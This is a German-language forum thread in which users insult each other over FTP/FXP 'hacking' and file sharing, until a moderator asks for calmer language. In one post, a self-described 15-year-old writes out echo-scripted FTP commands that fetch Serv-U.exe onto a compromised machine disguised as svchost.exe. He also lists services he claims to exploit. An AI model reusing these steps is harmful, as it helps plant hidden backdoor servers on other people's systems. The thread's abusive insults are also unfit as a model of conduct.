-
Moin,
Es tut mir ja Leid wenn du keine Kritik abkannst!!
WIr lernen es gerade in der Schule in Wirtschaft vielleicht solltest du auch mal wieder zur Schule gehen!!
P.s kleine Ergänzung:
Ich persönlich würde nicht erwischt sondern der Typ vom dem der Server war der musste 180 Zahlen und ich habe 5€ Dazu gegeben!!
Und nochwas Ati musste damals auch was spenden und er macht weiter und bis jetzt war nie wieder was
Stimmt's ati :P
MFG
-
also schwachhirn
moin du schwachkopf!
Du kannst weder scannen noch hacken noch hast du irgend ein Ahnung wie das abläuft bei FTP!
Also bevor du dich blamierst halt doch lieber die Fresse!
Der Typ der erwischt wurde musste keine Strfe bezahlen sondern nur die Transferkosten, weil da so viel up und down ging, nix STRAFE!
Ich mach auch was ich will und das mache ich gut!^^
Fileshariing wird im übrigen härter bestraft! Wie alt bissu man 12?
Was soll der mist? Was bildest du dir überhaupt ein mit dem Mod zu fucken?? und dann noch sry wenn ich dich beleidigt hab zu schreiben du nist doch dumm wie Schuh du Idiot! man regen mich solche Typen wie du auf!! Kriegst Emule grad so zum laufen und wilst bei FXP mitreden!
ARRRRRRRRRRRRRRGGGGGGGGG! ich könnt explodieren!!
Also lerne und staune mein Freund! Erst schlau machen dann dumm Texten!
-
@schlichti: du hast meine Kritik nicht ertragen und hast dann in diesem thread hier angefangen
@ati: zpggzdKein Kommentar. Auf so ein Niveau lass ich mich nicht herab. Lern doch einfach ordentlich zu argumentieren. Dann können wir gerne weiterreden. Ich lass mich nicht gerne beleidigen. Gegen konstruktive Kritk hab ich nix einzuweden. Allerdings in dieser Form? Ich hätte mich gern eines besseren belehren können, aber wenn du mir so kommst?
Ich bestreite ja garnicht, das ich NULL Ahnung von FTP hab. Und will ich auch garnicht haben. So viel saug ich nämlich auch nicht. Und in irgendeiner Fachzeitschrift, CHIP oder so, war mal ein Artikel wo vor den Unsicherheiten und Gefahren von FTP hingewiesen wurde.
-
Ati@
So, du kannst Sql haxxen "Bravo" zuqwwu
jetzt werde ich euch zeigen wie das geht dkggkq
Scannen
Connecten
Serv-u über echo hollen *LOL*
echo open ******* port >>c:\fuckyou.txt
echo User *******
echo PASS
binary
get Serv-u.exe c:\svchost.exe
So leute mehr müsst ihr nicht machen *EASY*, das gleiche kann man bei
WMS
IIS ( Unicod )
WEBDAVE
IIS_print
HOD
RealServer
RPC
RPCDCOM 2.0
NTPW ( geht über netbios *EASY*)
Netbios
Oracle
Apache ( Unicod )
MSNbug
OFFICE sp1 bug
Outlook . . . . . . bei uns
Also ich hacke nur PHP 2.0.2-2.0.7 ( APACHE unix )
oder Samba weil die über 50mbit+ sind und da kann ich was hacken und nicht nur serv-u hollen uyuddg
Also leute ATI ist ( noch ) ein Noobing wie alle anderen WIN haxxOrer xzpdqx
Sorry wegen der Rechtschreibungsfehler, bin noch 15 und muss noch schreiben lernen uyuddg
gruss Dulli
-
hi
@dalli:
sieht zwar alles sehr schön aus, aber was ist das?????????????????
ich bin gerade dabei mich damit auseinander zu setzen und ich hoffe das ati(wenn wir uns mal über icq treffen, weil bis jetzt haben wir uns immer verfehlt) mir da so einiges erzählen kann.
Aber so wie das aussieht hast du auch was drauf!!( trotz deiner 15 Jahre lol)
also wenn du lust hast poste doch mal wie man bei ftp/fxp so vorgeht!!
also im grunde so ne kleine gebrauchsanleitung oder so !!!
cu Seb
-
lööööööööööl
Du pissnelke! Jetzt werd ma net assisch, kannst nicht richitg Deutsch schreiben aba gfrosse Töne!
Wer bist du überhaupt?
löl
und was hast du mit dem ganzen hier zu tun? holt der Fisch seinen Freund der bissi haxxorn kann!
löl
Ich kann das was du da hast auch! aba sql mach ich am liebsten du sckratte, wenn du weisst was sackratten sind?
Hör ma ich bin bald doppelt so alt wie du du Schlumpf, was michst du dich überhaupt ein?
Soll das jetzt einen Szenenfick werden, was bissen du fürn haxxor der gleich mal ein TUT Posten, llllllllöööööööööööööl, man dafür gehörst du aus deinem Board gekickt, und zu mir n00b sagen, löööööööööl!
Also komm schon!
############################################
AN DEN ADMIN:
BITTE CLOSE DIESEN THREAD ES TUT MIR LEID DAS ICH HIER MIT SOWAS ANGEFANGEN HAB!
-
@ati1000:
Fang mal wieder an dich zu benehmen!!
Wenn du doppelt so alt bist wie Geraldino dann zeig das auch!
Das hier ist ein seriöses Board und so soll es auch bleiben.
Also, keine Kraftausdrücke mehr.
-
Moin,
@Ati,
Dein Wunsch sei mir Befehl!!
MFG